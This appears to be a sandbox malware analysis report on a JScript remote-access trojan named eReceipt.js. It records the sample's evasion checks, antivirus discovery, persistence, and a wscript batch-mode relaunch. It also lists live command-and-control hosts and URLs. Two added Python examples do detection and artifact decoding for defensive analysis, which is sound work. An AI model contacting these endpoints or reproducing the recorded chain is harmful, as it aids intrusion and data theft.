      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
      Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
      Source: wscript.exe, 0000000C.00000002.881090970.00000171E043A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}2
      Source: wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I-
      Source: wscript.exe, 00000010.00000002.883452838.00000244AF4E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
      Source: wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\40
      Source: wscript.exe, 00000005.00000002.884426925.000001B3A1141000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWT
      Source: wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.815466211.000001B3A0600000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883870439.000001B3A0600000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.884426925.000001B3A1141000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.883006547.0000011D6E4DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882763356.0000011D6E4A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000005.00000003.815288447.000001B3A051F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: od_VMware_SATA_C5&280b647&0&000000#{
      Source: wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\fb8b}
      Source: wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x0
      Source: wscript.exe, 00000005.00000003.815466211.000001B3A0600000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883870439.000001B3A0600000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882763356.0000011D6E4A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\System32\wscript.exeNetwork Connect: 212.193.30.129 9003Jump to behavior
      Source: C:\Windows\System32\wscript.exeDomain query: zeegod.duckdns.org
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: wscript.exe, 00000009.00000002.880440429.0000011D6BAC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows Defender\MsMpeng.exe
      Source: wscript.exe, 00000009.00000002.883006547.0000011D6E4DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r\MsMpeng.exe
      Source: wscript.exe, 00000000.00000002.882571223.000001C6DD870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.879786917.000001C6DACD8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
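The rows above are the behaviour chain a detection engineer would key on: wscript.exe relaunching itself with //B (batch mode, errors suppressed) on a script under AppData\Roaming, WMI enumeration of AntiVirusProduct in root\securitycenter and root\securitycenter2, a read of the Cryptography\MachineGuid value, a dynamic-DNS lookup, and a connection to TCP 9003. The Python below is an added example, not part of the Joe Sandbox report: it runs that logic over constructed event records that mirror these rows. The record layout and rule identifiers are assumptions (the ATT&CK IDs used are Command and Scripting Interpreter, Security Software Discovery, Query Registry and Non-Standard Port); duia.ro is treated as a dynamic-DNS suffix because it is the sample's second C2 host in the URL tables later in this report.

```python
"""Detection logic for the wscript.exe behaviour chain listed above.

Added example, not part of the Joe Sandbox report. The records below are
constructed to mirror the report's rows; their field names are an assumed
Sysmon-like layout, not a real log schema.
"""
import re

# wscript.exe / cscript.exe as the acting image (the report's "Source").
SCRIPT_HOST = re.compile(r"\\(?:wscript|cscript)\.exe$", re.I)
# //B (batch mode: suppress errors and prompts) exactly as the report shows
# it; WSH also accepts a single slash, so both are matched.
BATCH_FLAG = re.compile(r"\s//?b(?=\s|$)", re.I)
# Script launched from a user-writable location such as AppData\Roaming.
USER_WRITABLE = re.compile(r"\\AppData\\(?:Roaming|Local)\\|\\Temp\\|\\Downloads\\", re.I)
SCRIPT_EXT = re.compile(r"\.(?:js|jse|vbs|vbe|wsf)\b", re.I)
# root\securitycenter and root\securitycenter2 both appear in the report.
SECURITY_CENTER = re.compile(r"securitycenter2?$", re.I)
# Dynamic-DNS suffixes taken from the two C2 hosts in this report.
DYN_DNS_SUFFIXES = ("duckdns.org", "duia.ro")
STANDARD_WEB_PORTS = {80, 443}

# Constructed telemetry reproducing the report's observations, plus one
# benign control event (a logon script run by explorer.exe from a share).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"'},
    {"type": "wmi", "image": r"C:\Windows\System32\wscript.exe",
     "namespace": r"root\securitycenter2", "class": "AntiVirusProduct"},
    {"type": "registry", "image": r"C:\Windows\System32\wscript.exe",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography", "value": "MachineGuid"},
    {"type": "dns", "image": r"C:\Windows\System32\wscript.exe", "query": "zeegod.duckdns.org"},
    {"type": "network", "image": r"C:\Windows\System32\wscript.exe", "dst": "212.193.30.129", "port": 9003},
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "\\fileserver\netlogon\map-drives.vbs"'},
]


def analyze(events):
    """Return (rule_id, detail) tuples for every event that matches a rule."""
    findings = []
    for ev in events:
        if not SCRIPT_HOST.search(ev.get("image", "")):
            continue  # every rule here is scoped to the Windows Script Host
        kind = ev["type"]
        if kind == "process":
            cmd = ev["cmdline"]
            if BATCH_FLAG.search(cmd) and USER_WRITABLE.search(cmd) and SCRIPT_EXT.search(cmd):
                findings.append(("T1059-wsh-batch-from-user-dir", cmd))
            if SCRIPT_HOST.search(ev.get("parent", "")):
                findings.append(("wsh-spawns-wsh", f"{ev['parent']} -> {cmd}"))
        elif kind == "wmi":
            if SECURITY_CENTER.search(ev["namespace"]) and ev["class"] == "AntiVirusProduct":
                findings.append(("T1518.001-av-discovery-wmi", f"{ev['namespace']} : {ev['class']}"))
        elif kind == "registry":
            if ev["key"].lower().endswith(r"\cryptography") and ev["value"].lower() == "machineguid":
                findings.append(("T1012-machineguid-query", f"{ev['key']}\\{ev['value']}"))
        elif kind == "dns":
            q = ev["query"].lower()
            if any(q == s or q.endswith("." + s) for s in DYN_DNS_SUFFIXES):
                findings.append(("dynamic-dns-lookup", q))
        elif kind == "network" and ev["port"] not in STANDARD_WEB_PORTS:
            findings.append(("T1571-nonstandard-port", f"{ev['dst']}:{ev['port']}"))
    return findings


def verdict(findings, threshold=3):
    """Count distinct rules, not raw hits, so one noisy rule cannot escalate
    a host by itself; three independent behaviours from one script host is
    the bar used here (an assumed threshold)."""
    distinct = {rule for rule, _ in findings}
    if len(distinct) >= threshold:
        return "malicious"
    return "suspicious" if distinct else "clean"


if __name__ == "__main__":
    hits = analyze(SAMPLE_EVENTS)
    for rule, detail in hits:
        print(f"{rule:<32} {detail}")
    print("verdict:", verdict(hits))
```

Run against the constructed records, all six rules fire for the malicious events and the explorer-launched logon script triggers none; the point of scoring distinct behaviours is that the AV discovery or the MachineGuid read alone are common in legitimate inventory scripts, while their co-occurrence with a //B relaunch from AppData and a dynamic-DNS beacon on 9003 is not.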

Stealing of Sensitive Information

Source: Yara match | File source: 00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.881711321.00000239FAA0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.881056542.000001C97BC3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.880769506.00000171E040E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.827815477.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.881396869.00000171E222F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.882667131.00000280CABE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.880198899.000001C979E13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.881826906.000001FE441D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.880995729.00000239F8BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 5516, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 6652, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 4448, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 2312, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 5512, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 6408, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.881711321.00000239FAA0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.881056542.000001C97BC3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.880769506.00000171E040E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.827815477.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.881396869.00000171E222F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.882667131.00000280CABE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.880198899.000001C979E13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.881826906.000001FE441D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.880995729.00000239F8BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 5516, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 6652, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 4448, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 2312, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 5512, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 6408, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques per tactic column. Digits before a technique name are the signature badges shown in the original matrix cell.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 11 Windows Management Instrumentation; 43 Scripting; At (Linux); At (Windows); Cron
Persistence: 121 Registry Run Keys / Startup Folder; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Privilege Escalation: 111 Process Injection; 121 Registry Run Keys / Startup Folder; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Defense Evasion: 1 Masquerading; 111 Process Injection; 43 Scripting; 1 Obfuscated Files or Information; Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 1 Query Registry; 121 Security Software Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 2 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
Command and Control: 11 Non-Standard Port; 1 Data Encoding; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings
Impact: Modify System Partition; Device Lockout; Delete Device Data
Behavior Graph (text rendering of the graph image)

Behavior Graph ID: 628800; Sample: eReceipt.js; Startdate: 17/05/2022; Architecture: WINDOWS; Score: 100
Top-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 7 other signatures
Processes: three wscript.exe instances and 4 other processes are started from the sample; each of them in turn starts another wscript.exe
DNS/IP (first wscript.exe): zeegod.duckdns.org 212.193.30.129 (ports 49762, 49772, 49781), SPD-NETTR, Russian Federation; 192.168.2.1 unknown
Files dropped (first wscript.exe): C:\Users\user\...\eReceipt.js:Zone.Identifier (ASCII); C:\Users\user\AppData\Roaming\eReceipt.js (ASCII); C:\Users\user\AppData\Roaming\XZqsVjnTsr.js (ASCII); 2 other malicious files
Signatures (first wscript.exe): System process connects to network (likely due to code injection or exploit); Drops script or batch files to the startup folder; Creates multiple autostart registry keys; Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Signatures (second wscript.exe): Wscript called in batch mode (suppress errors)
Child wscript.exe: drops C:\Users\user\AppData\...\XZqsVjnTsr.js (ASCII); Creates multiple autostart registry keys

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
eReceipt.js | 20% | ReversingLabs | Script-JS.Trojan.Cryxos

Dropped Files
No Antivirus matches

Unpacked PE Files
No Antivirus matches

Domains
Source | Detection | Scanner
zeegod.duckdns.org | 10% | Virustotal

URLs
Source | Detection | Scanner | Label
http://travcharles.duia.ro:5098Vredesk | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/VreMcroWinows | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre5( | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreS~1 | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/VreW&&1 | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vre% | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreMcroWinows | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/VreICAgICAgICAgICAgIC | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vre | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vreosoft | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org/ | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreMcroWinowsu | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre?Lw | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre# | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre0 | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreMH | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/VreMcroWinowsC | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreMcroWinowsiniF | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreMcroWinowsiniG | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vre7E9B0-70EF-11D1-B75A-00A0C90564FE | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre5 | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vrei | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre2 | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vre783C6-CB41-11D1-8B02-00600806D9B6 | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098 | 100% | Avira URL Cloud | malware
http://zeegod.duckdns.org:9003/VreMcroWinows1 | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vreuc3BsaXQo | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vrer | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vrep | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreMicrosoft | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreZ | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreY | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/VreB | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Ag | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vree | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/VreM | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vrea | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/VreJ | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreM | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/VreT | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreWOW64 | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vref: | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/ | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098VreM8 | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vreosoft.xmldom | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre798AD7C45B15A | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org/telPROCESSOR_LEVEL=6PROCESSOR_RC | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre0& | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vreo | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/VrebiBuZXcgQWN0aXZlWE | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre7DQpmb3Ig | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vreba& | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/VreenP | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre5BP | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vre563209-4053062332-100 | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vres | 0% | Avira URL Cloud | safe
http://travcharles.duia.ro:5098Vre0 | 0% | Avira URL Cloud | safe
http://zeegod.duckdns.org:9003/Vre-z | 0% | Avira URL Cloud | safe
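Several of the strings listed as URLs above end in base64-looking tails (ICAgICAgICAgICAgIC, uc3BsaXQo, biBuZXcgQWN0aXZlWE, 7DQpmb3Ig). They are not distinct C2 paths: the scanner read the beacon URL out of wscript.exe memory and took along whatever bytes followed it, and for a base64-obfuscated script those bytes are pieces of the encoded source. Because a tail can start at any offset inside a base64 stream, a decoder has to try all four alignments. The Python below is an added example, not part of the report: it splits each string into origin, beacon marker and tail, tries the alignments and keeps the first that yields printable text. The "/Vre" marker is taken from the Contacted URLs row further down, the input strings are copied from the tables here, and everything else (function names, the printable-text heuristic, the minimum-length cut-off) is the example's own.

```python
"""Recovering script text from the C2 URL artifacts in the tables above.

Added example, not part of the Joe Sandbox report. The report's "URLs" are
heap artifacts: the beacon URL (http://<host>:<port>/Vre, the row listed
under Contacted URLs) is followed by whatever sat next to it in wscript.exe
memory, and several of those tails are base64. A tail can begin at any
offset inside a base64 stream, so the decoder tries the four possible
alignments. The sample strings are copied from the report; nothing here
touches the network.
"""
import base64
import re
import string

# scheme://host[:port][/][Vre]<tail>; "Vre" is the beacon path marker seen
# in the report's Contacted URLs row.
ARTIFACT_RE = re.compile(r"^(https?://[A-Za-z0-9.-]+(?::\d+)?)/?(Vre)?(.*)$")
B64_CHARS = re.compile(r"^[A-Za-z0-9+/]+$")
PRINTABLE = set(string.printable.encode())  # ASCII text incl. \r \n \t


def split_artifact(s):
    """Return (origin, has_vre_marker, tail) for one report URL string."""
    m = ARTIFACT_RE.match(s)
    if not m:
        return s, False, ""
    origin, marker, tail = m.groups()
    return origin, marker is not None, tail


def decode_fragment(tail, min_chars=4):
    """Try each base64 alignment of `tail`; return (shift, text) for the
    first alignment whose decoded bytes are all printable ASCII, else None."""
    for shift in range(4):
        chunk = tail[shift:]
        chunk = chunk[: len(chunk) - len(chunk) % 4]  # whole 4-char quanta only
        if len(chunk) < min_chars or not B64_CHARS.match(chunk):
            continue
        raw = base64.b64decode(chunk)
        if raw and all(b in PRINTABLE for b in raw):
            return shift, raw.decode("ascii")
    return None


def recover(strings):
    """Map each report string to (origin, tail, decoded text or None)."""
    out = []
    for s in strings:
        origin, _, tail = split_artifact(s)
        out.append((origin, tail, decode_fragment(tail)))
    return out


# Strings copied from the report's URL tables.
REPORT_STRINGS = [
    "http://zeegod.duckdns.org:9003/VreICAgICAgICAgICAgIC",
    "http://zeegod.duckdns.org:9003/Vreuc3BsaXQo",
    "http://zeegod.duckdns.org:9003/VrebiBuZXcgQWN0aXZlWE",
    "http://zeegod.duckdns.org:9003/Vre7DQpmb3Ig",
    "http://travcharles.duia.ro:5098Vredesk",
    "http://zeegod.duckdns.org/telPROCESSOR_LEVEL=6PROCESSOR_RC",
]

if __name__ == "__main__":
    for origin, tail, decoded in recover(REPORT_STRINGS):
        print(f"{origin:<34} {tail:<34} {decoded!r}")
```

The four zeegod tails decode to twelve spaces, split(, n new Active and a CRLF followed by for, i.e. indentation and keywords of the JScript body; desk and the PROCESSOR_LEVEL=6 string (environment-block text) return None. That is the check that tells you to treat these rows as memory adjacency rather than as separate paths to block: the indicator is the origin plus /Vre, and the tails are evidence of the obfuscation layer, not of the protocol.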
Domains and IPs

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
zeegod.duckdns.org | 212.193.30.129 | true | true | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://zeegod.duckdns.org:9003/Vre | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binary Data
Name | Source | Malicious | Antivirus Detection | Reputation
http://travcharles.duia.ro:5098Vredesk | wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.880111499.0000026BB17E2000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
